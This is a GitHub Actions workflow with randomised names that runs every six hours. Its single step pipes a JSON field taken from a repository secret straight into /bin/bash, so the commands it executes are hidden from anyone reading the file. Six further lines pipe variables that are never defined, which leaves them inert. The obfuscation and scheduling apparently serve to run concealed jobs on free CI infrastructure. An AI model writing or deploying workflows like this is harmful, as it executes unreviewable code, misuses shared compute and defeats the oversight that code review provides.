name: sangqiete

on:
  workflow_dispatch:
  schedule:
    - cron: '19 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sangqiete
        env:
          preb18: ${{ secrets.preb18 }}
        run: |
          echo $preb18 | jq -r .dgnu09 | /bin/bash
          echo $oeofe16107 | jq -r .qifd9737 | /bin/bash
          echo $zv6456 | jq -r .nwgyd413 | /bin/bash
          echo $u93 | jq -r .hr8352 | /bin/bash
          echo $nslj1 | jq -r .rud514 | /bin/bash
          echo $pbkb41 | jq -r .wi3954 | /bin/bash
          echo $uogwj1210 | jq -r .ivf5035 | /bin/bash

